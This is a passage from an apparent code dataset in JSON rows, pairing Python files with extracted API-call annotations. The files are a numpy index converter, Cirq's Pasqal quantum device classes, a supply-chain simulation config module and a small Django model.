False, 'import sys\\n'), ((1735, 1757), 'sys.stdout.write', 'sys.stdout.write', ([\"'\\\\r'\"], {}), \"('\\\\r')\\n\", (1751, 1757), False, 'import sys\\n'), ((1778, 1800), 'sys.stdout.write', 'sys.stdout.write', (['\"\"\"\\n\"\"\"'], {}), \"('\\\\n')\\n\", (1794, 1800), False, 'import sys\\n'), ((422, 448), 'os.popen', 'os.popen', (['\"\"\"stty size\"\"\"', '\"\"\"r\"\"\"'], {}), \"('stty size', 'r')\\n\", (430, 448), False, 'import os\\n'), ((475, 501), 'os.popen', 'os.popen', (['\"\"\"stty size\"\"\"', '\"\"\"r\"\"\"'], {}), \"('stty size', 'r')\\n\", (483, 501), False, 'import os\\n')]"}}},{"rowIdx":744,"cells":{"code":{"kind":"string","value":"from __future__ import absolute_import, division, print_function\n\nimport logging\nimport sys\n\nlogging.basicConfig(\n stream=sys.stdout,\n level=logging.DEBUG,\n format='%(asctime)s %(name)s-%(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\nimport numpy as np\nimport utils\nlogger = logging.getLogger(\"indexconverter\")\n\n\nclass IndexConverter(object):\n def __init__(self, ndim, ngrid):\n self.ndim = ndim\n self.ngrid = ngrid\n self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)]\n self._zerodim = np.zeros((self.ndim,))\n self.nbins = int(np.rint((ngrid - 1) ** ndim))\n\n def convert_to_vector(self, grid):\n if grid.shape[0] != self.ngrid - 1:\n raise Exception(\"Wrong dimension of grid. Expect length fo %s got %s\" % (self.ngrid - 1, grid.shape[0]))\n vector = np.empty((self.nbins,))\n for bin_idx in range(self.nbins):\n vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))]\n return vector\n\n def convert_to_grid(self, vector):\n grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1))\n if len(vector.shape) > 1:\n grids = np.empty((len(vector),) + grid_shape)\n for idx, v in enumerate(vector):\n grids[idx] = self.convert_to_grid(v)\n return grids\n else:\n grid = np.zeros(grid_shape)\n for idx in range(len(vector)):\n grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx]\n return grid\n\n def convert_to_grid_idx(self, bin_idx):\n if bin_idx >= self.nbins or bin_idx < 0:\n print(self.nbins, self.ndim, self.nbins ** self.ndim)\n raise Exception(\"Invalid index %s. You are probably outside the grid...\" % bin_idx)\n grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1)\n return grid_idx.astype(int)\n\n def convert_to_bin_idx(self, grid_idx):\n bin_idx = utils.rint(np.sum(grid_idx * self._modulus))\n if bin_idx >= self.nbins or bin_idx < 0:\n raise Exception(\n \"Invalid bin index %s. You are probably outside the grid. Size:%s\" % (bin_idx, self.nbins))\n return bin_idx\n"},"apis":{"kind":"list like","value":["logging.basicConfig","logging.getLogger","numpy.sum","numpy.zeros","numpy.empty","numpy.rint"],"string":"[\n \"logging.basicConfig\",\n \"logging.getLogger\",\n \"numpy.sum\",\n \"numpy.zeros\",\n \"numpy.empty\",\n \"numpy.rint\"\n]"},"extract_api":{"kind":"string","value":"[((93, 249), 'logging.basicConfig', 'logging.basicConfig', ([], {'stream': 'sys.stdout', 'level': 'logging.DEBUG', 'format': '\"\"\"%(asctime)s %(name)s-%(levelname)s: %(message)s\"\"\"', 'datefmt': '\"\"\"%Y-%m-%d %H:%M:%S\"\"\"'}), \"(stream=sys.stdout, level=logging.DEBUG, format=\\n '%(asctime)s %(name)s-%(levelname)s: %(message)s', datefmt=\\n '%Y-%m-%d %H:%M:%S')\\n\", (112, 249), False, 'import logging\\n'), ((298, 333), 'logging.getLogger', 'logging.getLogger', (['\"\"\"indexconverter\"\"\"'], {}), \"('indexconverter')\\n\", (315, 333), False, 'import logging\\n'), ((556, 578), 'numpy.zeros', 'np.zeros', (['(self.ndim,)'], {}), '((self.ndim,))\\n', (564, 578), True, 'import numpy as np\\n'), ((852, 875), 'numpy.empty', 'np.empty', (['(self.nbins,)'], {}), '((self.nbins,))\\n', (860, 875), True, 'import numpy as np\\n'), ((604, 632), 'numpy.rint', 'np.rint', (['((ngrid - 1) ** ndim)'], {}), '((ngrid - 1) ** ndim)\\n', (611, 632), True, 'import numpy as np\\n'), ((1384, 1404), 'numpy.zeros', 'np.zeros', (['grid_shape'], {}), '(grid_shape)\\n', (1392, 1404), True, 'import numpy as np\\n'), ((1993, 2025), 'numpy.sum', 'np.sum', (['(grid_idx * self._modulus)'], {}), '(grid_idx * self._modulus)\\n', (1999, 2025), True, 'import numpy as np\\n'), ((1084, 1103), 'numpy.zeros', 'np.zeros', (['self.ndim'], {}), '(self.ndim)\\n', (1092, 1103), True, 'import numpy as np\\n')]"}}},{"rowIdx":745,"cells":{"code":{"kind":"string","value":"# Copyright 2020 The Cirq Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict\nimport numpy as np\nimport networkx as nx\n\nimport cirq\nfrom cirq import _compat, GridQubit, LineQubit\nfrom cirq.ops import NamedQubit\nfrom cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n\n\n@cirq.value.value_equality\nclass PasqalDevice(cirq.devices.Device):\n \"\"\"A generic Pasqal device.\n\n The most general of Pasqal devices, enforcing only restrictions expected to\n be shared by all future devices. Serves as the parent class of all Pasqal\n devices, but can also be used on its own for hosting a nearly unconstrained\n device. When used as a circuit's device, the qubits have to be of the type\n cirq.NamedQubit and assumed to be all connected, the idea behind it being\n that after submission, all optimization and transpilation necessary for its\n execution on the specified device are handled internally by Pasqal.\n \"\"\"\n\n def __init__(self, qubits: Sequence[cirq.Qid]) -> None:\n \"\"\"Initializes a device with some qubits.\n\n Args:\n qubits (NamedQubit): Qubits on the device, exclusively unrelated to\n a physical position.\n Raises:\n TypeError: If the wrong qubit type is provided.\n ValueError: If the number of qubits is greater than the devices maximum.\n\n \"\"\"\n if len(qubits) > 0:\n q_type = type(qubits[0])\n\n for q in qubits:\n if not isinstance(q, self.supported_qubit_type):\n raise TypeError(\n 'Unsupported qubit type: {!r}. This device '\n 'supports qubit types: {}'.format(q, self.supported_qubit_type)\n )\n if not type(q) is q_type:\n raise TypeError(\"All qubits must be of same type.\")\n\n if len(qubits) > self.maximum_qubit_number:\n raise ValueError(\n 'Too many qubits. {} accepts at most {} '\n 'qubits.'.format(type(self), self.maximum_qubit_number)\n )\n\n self.gateset = PasqalGateset()\n self.qubits = qubits\n self._metadata = cirq.DeviceMetadata(\n qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b])\n )\n\n # pylint: enable=missing-raises-doc\n @property\n def supported_qubit_type(self):\n return (NamedQubit,)\n\n @property\n def maximum_qubit_number(self):\n return 100\n\n @property\n def metadata(self):\n return self._metadata\n\n @_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15')\n def qubit_set(self) -> FrozenSet[cirq.Qid]:\n return frozenset(self.qubits)\n\n def qubit_list(self):\n return [qubit for qubit in self.qubits]\n\n def is_pasqal_device_op(self, op: cirq.Operation) -> bool:\n if not isinstance(op, cirq.Operation):\n raise ValueError('Got unknown operation:', op)\n return op in self.gateset\n\n def validate_operation(self, operation: cirq.Operation):\n \"\"\"Raises an error if the given operation is invalid on this device.\n\n Args:\n operation: The operation to validate.\n\n Raises:\n ValueError: If the operation is not valid.\n NotImplementedError: If the operation is a measurement with an invert\n mask.\n \"\"\"\n\n if not isinstance(operation, cirq.GateOperation):\n raise ValueError(\"Unsupported operation\")\n\n if not self.is_pasqal_device_op(operation):\n raise ValueError(f'{operation.gate!r} is not a supported gate')\n\n for qub in operation.qubits:\n if not isinstance(qub, self.supported_qubit_type):\n raise ValueError(\n '{} is not a valid qubit for gate {!r}. This '\n 'device accepts gates on qubits of type: '\n '{}'.format(qub, operation.gate, self.supported_qubit_type)\n )\n if qub not in self.metadata.qubit_set:\n raise ValueError(f'{qub} is not part of the device.')\n\n if isinstance(operation.gate, cirq.MeasurementGate):\n if operation.gate.invert_mask != ():\n raise NotImplementedError(\n \"Measurements on Pasqal devices don't support invert_mask.\"\n )\n\n def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None:\n \"\"\"Raises an error if the given circuit is invalid on this device.\n\n A circuit is invalid if any of its moments are invalid or if there\n is a non-empty moment after a moment with a measurement.\n\n Args:\n circuit: The circuit to validate\n\n Raises:\n ValueError: If the given circuit can't be run on this device\n \"\"\"\n super().validate_circuit(circuit)\n\n # Measurements must be in the last non-empty moment\n has_measurement_occurred = False\n for moment in circuit:\n if has_measurement_occurred:\n if len(moment.operations) > 0:\n raise ValueError(\"Non-empty moment after measurement\")\n for operation in moment.operations:\n if isinstance(operation.gate, cirq.MeasurementGate):\n has_measurement_occurred = True\n\n def __repr__(self):\n return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})'\n\n def _value_equality_values_(self):\n return self.qubits\n\n def _json_dict_(self):\n return cirq.protocols.obj_to_dict_helper(self, ['qubits'])\n\n\nclass PasqalVirtualDevice(PasqalDevice):\n \"\"\"A Pasqal virtual device with qubits in 3d.\n\n A virtual representation of a Pasqal device, enforcing the constraints\n typically found in a physical device. The qubits can be positioned in 3d\n space, although 2d layouts will be supported sooner and are thus\n recommended. Only accepts qubits with physical placement.\n \"\"\"\n\n def __init__(\n self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]]\n ) -> None:\n \"\"\"Initializes a device with some qubits.\n\n Args:\n control_radius: the maximum distance between qubits for a controlled\n gate. Distance is measured in units of the coordinates passed\n into the qubit constructor.\n qubits: Qubits on the device, identified by their x, y, z position.\n Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit.\n\n Raises:\n ValueError: if the wrong qubit type is provided or if invalid\n parameter is provided for control_radius.\"\"\"\n\n super().__init__(qubits)\n\n if not control_radius >= 0:\n raise ValueError('Control_radius needs to be a non-negative float.')\n\n if len(self.qubits) > 1:\n if control_radius > 3.0 * self.minimal_distance():\n raise ValueError(\n 'Control_radius cannot be larger than 3 times'\n ' the minimal distance between qubits.'\n )\n self.control_radius = control_radius\n self.gateset = PasqalGateset(include_additional_controlled_ops=False)\n self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate))\n\n @property\n def supported_qubit_type(self):\n return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit)\n\n def validate_operation(self, operation: cirq.Operation):\n \"\"\"Raises an error if the given operation is invalid on this device.\n\n Args:\n operation: the operation to validate\n Raises:\n ValueError: If the operation is not valid\n \"\"\"\n super().validate_operation(operation)\n\n # Verify that a controlled gate operation is valid\n if operation in self.controlled_gateset:\n for p in operation.qubits:\n for q in operation.qubits:\n if self.distance(p, q) > self.control_radius:\n raise ValueError(f\"Qubits {p!r}, {q!r} are too far away\")\n\n def validate_moment(self, moment: cirq.Moment):\n \"\"\"Raises an error if the given moment is invalid on this device.\n\n Args:\n moment: The moment to validate.\n Raises:\n ValueError: If the given moment is invalid.\n \"\"\"\n\n super().validate_moment(moment)\n if len(moment) > 1:\n for operation in moment:\n if not isinstance(operation.gate, cirq.MeasurementGate):\n raise ValueError(\"Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.\")\n\n def minimal_distance(self) -> float:\n \"\"\"Returns the minimal distance between two qubits in qubits.\n\n Args:\n qubits: qubit involved in the distance computation\n\n Raises:\n ValueError: If the device has only one qubit\n\n Returns:\n The minimal distance between qubits, in spacial coordinate units.\n \"\"\"\n if len(self.qubits) <= 1:\n raise ValueError(\"Two qubits to compute a minimal distance.\")\n\n return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2])\n\n def distance(self, p: Any, q: Any) -> float:\n \"\"\"Returns the distance between two qubits.\n\n Args:\n p: qubit involved in the distance computation\n q: qubit involved in the distance computation\n\n Raises:\n ValueError: If p or q not part of the device\n\n Returns:\n The distance between qubits p and q.\n \"\"\"\n all_qubits = self.qubit_list()\n if p not in all_qubits or q not in all_qubits:\n raise ValueError(\"Qubit not part of the device.\")\n\n if isinstance(p, GridQubit):\n return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\n\n if isinstance(p, LineQubit):\n return abs(p.x - q.x)\n\n return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)\n\n def __repr__(self):\n return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format(\n self.control_radius, sorted(self.qubits)\n )\n\n def _value_equality_values_(self) -> Any:\n return (self.control_radius, self.qubits)\n\n def _json_dict_(self) -> Dict[str, Any]:\n return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits'])\n\n\n@_compat.deprecated_class(\n deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).'\n)\nclass PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates):\n \"\"\"A gate converter for compatibility with Pasqal processors.\n\n Modified version of ConvertToNeutralAtomGates, where a new 'convert' method\n 'pasqal_convert' takes the 'keep' function as an input.\n \"\"\"\n\n def pasqal_convert(\n self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool]\n ) -> List[cirq.Operation]:\n def on_stuck_raise(bad):\n return TypeError(\n \"Don't know how to work with {!r}. \"\n \"It isn't a native PasqalDevice operation, \"\n \"a 1 or 2 qubit gate with a known unitary, \"\n \"or composite.\".format(bad)\n )\n\n return cirq.protocols.decompose(\n op,\n keep=keep,\n intercepting_decomposer=self._convert_one,\n on_stuck_raise=None if self.ignore_failures else on_stuck_raise,\n )\n"},"apis":{"kind":"list like","value":["numpy.sqrt","cirq.protocols.decompose","cirq.AnyIntegerPowerGateFamily","cirq._compat.deprecated","networkx.from_edgelist","cirq._compat.deprecated_class","cirq.protocols.obj_to_dict_helper","cirq_pasqal.PasqalGateset"],"string":"[\n \"numpy.sqrt\",\n \"cirq.protocols.decompose\",\n \"cirq.AnyIntegerPowerGateFamily\",\n \"cirq._compat.deprecated\",\n \"networkx.from_edgelist\",\n \"cirq._compat.deprecated_class\",\n \"cirq.protocols.obj_to_dict_helper\",\n \"cirq_pasqal.PasqalGateset\"\n]"},"extract_api":{"kind":"string","value":"[((10990, 11116), 'cirq._compat.deprecated_class', '_compat.deprecated_class', ([], {'deadline': '\"\"\"v0.16\"\"\"', 'fix': '\"\"\"Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).\"\"\"'}), \"(deadline='v0.16', fix=\\n 'Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).')\\n\", (11014, 11116), False, 'from cirq import _compat, GridQubit, LineQubit\\n'), ((3091, 3179), 'cirq._compat.deprecated', '_compat.deprecated', ([], {'fix': '\"\"\"Use metadata.qubit_set() if applicable.\"\"\"', 'deadline': '\"\"\"v0.15\"\"\"'}), \"(fix='Use metadata.qubit_set() if applicable.', deadline=\\n 'v0.15')\\n\", (3109, 3179), False, 'from cirq import _compat, GridQubit, LineQubit\\n'), ((2636, 2651), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {}), '()\\n', (2649, 2651), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\\n'), ((6074, 6125), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', \"['qubits']\"], {}), \"(self, ['qubits'])\\n\", (6107, 6125), False, 'import cirq\\n'), ((7717, 7771), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {'include_additional_controlled_ops': '(False)'}), '(include_additional_controlled_ops=False)\\n', (7730, 7771), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\\n'), ((10519, 10582), 'numpy.sqrt', 'np.sqrt', (['((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)'], {}), '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)\\n', (10526, 10582), True, 'import numpy as np\\n'), ((10917, 10986), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', \"['control_radius', 'qubits']\"], {}), \"(self, ['control_radius', 'qubits'])\\n\", (10950, 10986), False, 'import cirq\\n'), ((11843, 11999), 'cirq.protocols.decompose', 'cirq.protocols.decompose', (['op'], {'keep': 'keep', 'intercepting_decomposer': 'self._convert_one', 'on_stuck_raise': '(None if self.ignore_failures else on_stuck_raise)'}), '(op, keep=keep, intercepting_decomposer=self.\\n _convert_one, on_stuck_raise=None if self.ignore_failures else\\n on_stuck_raise)\\n', (11867, 11999), False, 'import cirq\\n'), ((2747, 2815), 'networkx.from_edgelist', 'nx.from_edgelist', (['[(a, b) for a in qubits for b in qubits if a != b]'], {}), '([(a, b) for a in qubits for b in qubits if a != b])\\n', (2763, 2815), True, 'import networkx as nx\\n'), ((7819, 7865), 'cirq.AnyIntegerPowerGateFamily', 'cirq.AnyIntegerPowerGateFamily', (['cirq.CZPowGate'], {}), '(cirq.CZPowGate)\\n', (7849, 7865), False, 'import cirq\\n'), ((10378, 10430), 'numpy.sqrt', 'np.sqrt', (['((p.row - q.row) ** 2 + (p.col - q.col) ** 2)'], {}), '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\\n', (10385, 10430), True, 'import numpy as np\\n')]"}}},{"rowIdx":746,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\n\nfrom enum import Enum, IntEnum, unique\nimport os\n\n\nAPP_NAME = \"mine2farm\"\nNETWORK_NAME = \"CenterAxis\"\nLOG_LEVEL_CONSOLE = \"WARNING\"\nLOG_LEVEL_FILE = \"INFO\"\nAPP_FOLDER = os.getenv(\"JESA_MINE2FARM_HOME\", \"C:/GitRepos/mine2farm/\")\nLOG_FOLDER = APP_FOLDER + \"app/log/\"\nLOG_FILE = \"%(asctime)_\" + APP_NAME + \".log\"\nOUTPUT_FOLDER = \"%s%s\" % (APP_FOLDER, \"outputs/\")\nCANVAS_URL = \"http://127.0.0.1/canvas.xlsm\"\n\n\n# DB\nDB_NAME = None\nDB_HOST = \"172.29.161.208\"\nDB_PORT = 5006\n\nDATA_SERVICE_ADD = \"172.29.161.208\"\nDATA_SERVICE_PORT = 5001\n\n\n# Results\nDB_RESULT_NAME = \"%s_results\" % DB_NAME if DB_NAME is not None else None\nDB_DETAILED_RESULT_COLLECTION_NAME = \"detailed\"\nDB_GLOBAL_RESULT_COLLECTION_NAME = \"global\"\nDB_GLOBAL_BEST_RESULT_COLLECTION_NAME = \"global_best\"\nDB_DETAILED_BEST_RESULT_COLLECTION_NAME = \"detailed_best\"\nDB_SENSITIVITY_COLLECTION_NAME = \"sensitivity\"\nRESULT_BATCHES_SIZE = 25\nHEAD_DATA_BITS = 17\nDB_NAME_BITS = 20\nRANDOMIZE_RESULTS = False\n\n\n# RabbitMQ\nRABBITMQ_SERVER = \"localhost\"\nRABBITMQ_SIMULATOR_QUEUE_NAME = \"SIMULATE\"\nRABBITMQ_CYCLE = 3\nRABBITMQ_DETAILED_RESULT_QUEUE_NAME = \"SAVE_DETAIL\"\nRABBITMQ_GLOBAL_RESULT_QUEUE_NAME = \"SAVE_GLOBAL\"\nRABBITMQ_MAX_WORKER = RABBITMQ_CYCLE\nRABBITMQ_PATH = \"C:\\\\Program Files\\\\RabbitMQ Server\\\\rabbitmq_server-3.8.1\\\\sbin\"\n\n\n# Memcached\nMEMCACHED_SERVER = 'localhost'\nMEMCACHED_PORT = 11211\n\n\n# Dashboard\nDB_LOAD_FROM_SERVICE = True\n\n\n# Monitoring\nMONITORING_APP_NAME = \"mine2farm_monitor\"\nMONITORING_SERVER = \"172.29.161.208\"\nMONITORING_PORT = 5002\nMONITORING_DB_NAME = \"task_history\"\nMONITORING_COLLECTION_HISTORY_NAME = \"task\"\nMONITORING_COLLECTION_HISTORY_BEST_NAME = \"best_scenarios_history\"\nMONITORING_STEP = 1\nMONITORING_NB_PAGE = 10\n\n\n# Mongodb-bi\nMONGODB_BI_PATH = \"C:\\\\Program Files\\\\MongoDB\\\\Connector for BI\\\\2.13\\\\bin\"\n\n\n# Mongodb\nMONGO_SERVER_PATH = \"C:\\\\Program Files\\\\MongoDB\\\\Server\\\\4.0\\\\bin\"\n\n\n# params\nLOGISTICS_LP = False\nMODE_DEBUG = False\nGRANUL_RELAX = False\n\n\nclass HTML_STATUS(IntEnum):\n ERROR = -1\n OK = 0\n\n\n# Model\nMONIKER_SEPARATOR = \"/\"\nWACC = 0.1\nT0 = 2020\nTMAX = 2031\n\nclass PriceParams(Enum):\n WACC = 0\n TENOR = 1\n VOLUME = 2\n\nclass PipelineType(Enum):\n COMMON = 0\n PRODUCER = 1\n TRANSPORT = 2\n BALANCE = 3\n PRICE = 4\n SALES = 5\n\n@unique\nclass PipelineLayer(IntEnum):\n UNDEFINED = -1\n MINE = 0\n BENEFICIATION = 1\n SAP = 2\n PAP = 3\n GRANULATION = 4\n LOGISTICS = 5\n RAW_MATERIALS = 8\n COMMON = 9\n SALES_PLAN = 10\n MINE_BENEFICIATION = 11\n UNIT_CONVERSION_MATRIX = 12\n\nPIPELINE_SCHEMA = {\n PipelineLayer.COMMON: {\n \"type\": PipelineType.COMMON,\n \"dico\": [\"location\", \"opex\", \"unit\", \"currency\", \"output\", \"names\", \"products\"]\n },\n\n PipelineLayer.MINE: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"mine.name\", \"mine.extraction\", \"mine.quality\", \"mine.capex\"],\n \"options\": \"mining_options\",\n \"production\": \"mining_specific_production\",\n \"opex\": \"mining_opex___specific_consumptions\",\n \"capex\": \"mining_capex\",\n \"priority_mines\": \"prioritymines\"\n },\n\n PipelineLayer.BENEFICIATION: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"beneficiation.name\", \"beneficitation.process\", \"beneficitation.quality\", \"beneficitation.capex\"],\n \"options\": \"beneficiation_options\",\n \"production\": \"beneficiation_production\",\n \"opex\": \"beneficiation_opex___specific_consumptions\",\n \"capex\": \"beneficiation_capex\"\n },\n\n PipelineLayer.SAP: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"sap.name\", \"sap.process\", \"sap.product\", \"sap.capex\", \"sap.capacity[kt]\"],\n \"options\": \"sap___power_plant_options\",\n \"production\": \"sap___power_plant_production\",\n \"opex\": \"sap___power_plant_opex___specific_consumptions\",\n \"capex\": \"sap___power_plant_capex\",\n \"product_type\": \"sap.product\"\n },\n\n PipelineLayer.PAP: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"pap.name\", \"pap.process\", \"pap.product\", \"pap.capex\", \"pap.size[kt]\", \"pap.input\"],\n \"options\": \"pap_options\",\n \"production\": \"pap_production\",\n \"opex\": \"pap_opex___specific_consumptions\",\n \"capex\": \"pap_capex\",\n \"product_type\": \"pap.product\"\n },\n\n PipelineLayer.GRANULATION: {\n \"type\": PipelineType.PRODUCER,\n \"dico\": [\"granulation.name\", \"granulation.process\", \"granulation.product\", \"granulation.capex\", \"granulation.input\"],\n \"options\": \"granulation_options\",\n \"production\": \"granulation_production\",\n \"opex\": \"granulation_opex\",\n \"capex\": \"granulation_capex\"\n },\n\n PipelineLayer.LOGISTICS: {\n \"type\": PipelineType.TRANSPORT,\n \"dico\": [\"logistics.name\", \"logistics.process\", \"logistics.product\", \"logistics.capex\"],\n \"options\": \"logistics_options\",\n \"production\": None,\n \"opex\": \"logistics_opex\",\n \"capex\": \"logistics_capex\"\n },\n\n PipelineLayer.RAW_MATERIALS: {\n \"type\": PipelineType.PRICE,\n \"data\": \"raw_materials\"\n },\n\n PipelineLayer.SALES_PLAN: {\n \"type\": PipelineType.SALES,\n \"data\": \"sales_plan\"\n },\n PipelineLayer.UNIT_CONVERSION_MATRIX: {\n \"type\": PipelineType.COMMON,\n \"data\": \"conv_matrix\"\n },\n}\n\n\n\nSUPPLY_CHAIN = \"mine2port\"\nDEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE),\n \"sap2pap\": (PipelineLayer.SAP, PipelineLayer.PAP)}\nCOMBO_NODES = {\n PipelineLayer.MINE_BENEFICIATION: {\n \"url\": \"mining_wp_connections\",\n \"upstream_layer\": PipelineLayer.MINE,\n \"downstream_layer\": PipelineLayer.BENEFICIATION\n }\n}\nCOMBO_NODES_SEPARATION = \"--\"\n\nclass FunctionType(Enum):\n COST_PV = 0\n CASH_COST = 1\n FULL_COST = 2\n\nclass ScenarioGeneratorType(IntEnum):\n FROM_PATHS = 0\n FROM_OPTIONS = 1\n SPECIFIC_SCENARIOS = 2\nSCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS\n\nPIPELINE_METADATA = {\n PipelineLayer.MINE: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Name\", \"Extraction\", \"Quality\", \"Unit\"],\n \"opex\": [\"Name\", \"Extraction\", \"Capacity\", \"Item\", \"Unit\"],\n \"capex\": [\"Name\", \"Extraction\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.BENEFICIATION: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Process\", \"InputQuality\", \"OutputQuality\", \"Humidity\", \"Unit\"],\n \"opex\": [\"Process\", \"InputQuality\", \"OutputQuality\", \"Item\", \"Unit\"],\n \"capex\": [\"Name\", \"Process\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.SAP: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Location\", \"Process\", \"Product\", \"Unit\"],\n \"opex\": [\"Location\", \"Process\", \"Item\", \"Unit\"],\n \"capex\": [\"Location\", \"Process\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.PAP: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Process\", \"Input\", \"Product\", \"Unit\"],\n \"opex\": [\"Location\", \"Process\", \"Capacity\", \"Input\", \"Item\", \"Product\", \"Unit\"],\n \"capex\": [\"Location\", \"Process\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.GRANULATION: {\n \"type\": PipelineType.PRODUCER,\n \"production\": [\"Process\", \"Input\", \"Product\", \"Unit\"],\n \"opex\": [\"Location\", \"ProductionSite\", \"Process\", \"Capacity\", \"Product\", \"Item\", \"Unit\"],\n \"capex\": [\"Location\", \"ProductionSite\", \"Product\", \"Process\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.LOGISTICS: {\n \"type\": PipelineType.TRANSPORT,\n \"opex\": [\"Upstream\", \"Downstream\", \"Method\", \"Product\", \"Capacity\", \"Item\", \"Unit\"],\n \"capex\": [\"Upstream\", \"Downstream\", \"Method\", \"Product\", \"Capacity\", \"Item\", \"Unit\", \"CAPEX\"]\n },\n PipelineLayer.RAW_MATERIALS: {\n \"type\": PipelineType.PRICE,\n \"columns\": [\"Item\", \"Unit\"]\n },\n PipelineLayer.SALES_PLAN: {\n \"type\": PipelineType.PRICE,\n \"columns\": [\"Type\", \"Product\", \"Unit\"]\n },\n PipelineLayer.UNIT_CONVERSION_MATRIX: {\n \"type\": PipelineType.COMMON,\n \"columns\": [\"Initial Unit\", \"Uniform Unit\", \"Conversion Rate\"]\n },\n}\n\n\nclass ShuffleLevel(IntEnum):\n UNDEFINED = 0\n SHUFFLE_WITHOUT_PERM = 1\n SHUFFLE_WITH_PERMUTATIONS = 2\n SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3\n SHUFFLE_WITH_UNNAMED = 4\n\n\nSHUFFLE_LEVELS = {\n PipelineLayer.MINE: ShuffleLevel.UNDEFINED,\n PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED,\n PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,\n PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,\n PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED,\n PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED,\n PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED\n}"},"apis":{"kind":"list like","value":["os.getenv"],"string":"[\n \"os.getenv\"\n]"},"extract_api":{"kind":"string","value":"[((195, 253), 'os.getenv', 'os.getenv', (['\"\"\"JESA_MINE2FARM_HOME\"\"\"', '\"\"\"C:/GitRepos/mine2farm/\"\"\"'], {}), \"('JESA_MINE2FARM_HOME', 'C:/GitRepos/mine2farm/')\\n\", (204, 253), False, 'import os\\n')]"}}},{"rowIdx":747,"cells":{"code":{"kind":"string","value":"from django.db import models\n\n# Create your models here.\n\nclass Destination(models.Model) :\n name = models.CharField(max_length = 100)\n img = models.ImageField(upload_to = 'pics')\n desc = models.TextField()\n price = models.IntegerField()\n offer = models.BooleanField(default = False)\n \nclass News() :\n id : int\n img : str\n date : int\n month : str\n headline : str\n category : str\n desc : str"},"apis":{"kind":"list like","value":["django.db.models.TextField","django.db.models.IntegerField","django.db.models.BooleanField","django.db.models.ImageField","django.db.models.CharField"],"string":"[\n \"django.db.models.TextField\",\n \"django.db.models.IntegerField\",\n \"django.db.models.BooleanField\",\n \"django.db.models.ImageField\",\n \"django.db.models.CharField\"\n]"},"extract_api":{"kind":"string","value":"[((103, 135), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), 